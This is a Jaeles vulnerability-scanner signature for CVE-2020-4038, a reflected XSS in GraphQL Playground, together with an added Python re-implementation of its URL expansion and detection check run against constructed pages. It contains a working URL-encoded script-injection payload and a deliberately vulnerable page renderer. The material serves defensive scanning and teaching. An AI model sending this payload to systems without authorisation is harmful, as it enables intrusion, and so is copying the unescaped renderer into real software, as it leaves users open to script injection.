id: CVE-2020-4038
info:
  name: Graphql Playground XSS
  risk: Medium

params:
  - root: '{{.BaseURL}}'

variables:
  # One request is generated per line: the two paths where GraphQL Playground
  # is commonly mounted.
  - graph: |
      /graphql/
      /apis/dashboards/v1/graphql/
  # URL-encoded form of </script><script>alert(1)</script>; the closing tag
  # breaks out of the inline <script> block in which Playground embeds its options.
  - xss: |
      %3C%2Fscript%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E

requests:
  - method: GET
    # Do not follow redirects: a 302 to a login or landing page would otherwise
    # be fetched and checked instead of the Playground page itself.
    redirect: false
    headers:
      - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
      - Upgrade-Insecure-Requests: 1
      - Accept: text/html
      - Accept-Encoding: gzip, deflate
      - Accept-Language: en-US,en;q=0.9
    url: >-
      {{.root}}{{.graph}}{{.xss}}
    # Match only when the page is served as HTML and the decoded payload is
    # reflected unescaped. This confirms reflection, not script execution.
    detections:
      - >-
        StatusCode() == 200 && StringSearch("resHeaders", "text/html") && StringSearch("body", '</script><script>alert(1)</script>')

references:
  - link: https://github.com/prisma-labs/graphql-playground/security/advisories/GHSA-4852-vrh7-28rf
  - link: https://www.cvebase.com/cve/2020/4038
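The following is an added example, not part of the Jaeles signature above or of the graphql-playground project. It expands the signature's URL template the way Jaeles fans a multi-line variable out into one request per value, re-implements the three detection conditions in plain Python, and runs them against two constructed pages: one that embeds the requested endpoint in an inline `<script>` as raw JSON (the bug class the advisory describes) and one that applies the generic mitigation of breaking up `</` so a premature closing tag can never appear. The host `http://target.example`, the `render_playground` page and its `escape` option are assumptions for the demonstration; they are not the project's code or its actual fix.

```python
# Added example: offline re-implementation of the CVE-2020-4038 signature logic.
import json
from itertools import product
from urllib.parse import unquote

# Values copied from the signature. ROOT stands in for {{.BaseURL}} (assumed host).
ROOT = "http://target.example"
GRAPH_PATHS = ["/graphql/", "/apis/dashboards/v1/graphql/"]
XSS_PAYLOADS = ["%3C%2Fscript%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E"]


def decoded_payload(payload=XSS_PAYLOADS[0]):
    """The string the detection looks for in the body: the URL-decoded payload."""
    return unquote(payload)  # '</script><script>alert(1)</script>'


def build_urls(root=ROOT, graph_paths=GRAPH_PATHS, payloads=XSS_PAYLOADS):
    """Expand {{.root}}{{.graph}}{{.xss}} over every path/payload combination."""
    return [f"{root}{path}{payload}" for path, payload in product(graph_paths, payloads)]


def detect(status_code, headers, body, payload=XSS_PAYLOADS[0]):
    """Mirror the signature's detection expression:
    StatusCode() == 200 && StringSearch("resHeaders", "text/html")
                        && StringSearch("body", <decoded payload>)
    `headers` is a dict; the header search runs over the flattened header text.
    """
    res_headers = "\n".join(f"{k}: {v}" for k, v in headers.items())
    return status_code == 200 and "text/html" in res_headers and decoded_payload(payload) in body


def render_playground(endpoint, escape=False):
    """Constructed stand-in (assumption, not project code) for a server page that
    serialises the requested endpoint into an inline <script> block as JSON.
    json.dumps does not escape '<' or '/', so with escape=False the '</script>'
    carried in the URL terminates the script element early. escape=True applies
    the generic hardening of emitting '<\\/' instead of '</' inside the JSON.
    """
    opts = json.dumps({"endpoint": endpoint})
    if escape:
        opts = opts.replace("</", "<\\/")
    return f"<html><body><script>window.playgroundOpts = {opts};</script></body></html>"


if __name__ == "__main__":
    html_headers = {"Content-Type": "text/html; charset=utf-8"}
    for url in build_urls():
        print("request:", url)
    endpoint = "/graphql/" + decoded_payload()
    print("unescaped page matches:", detect(200, html_headers, render_playground(endpoint)))
    print("escaped page matches:  ", detect(200, html_headers, render_playground(endpoint, escape=True)))
```

Note what the escaped case shows about the check's limits: the body still contains the page's own legitimate `</script>`, but not the full reflected payload, so the signature stays quiet. Conversely, a match only proves the decoded payload came back verbatim inside an HTML response; confirming execution still needs a browser.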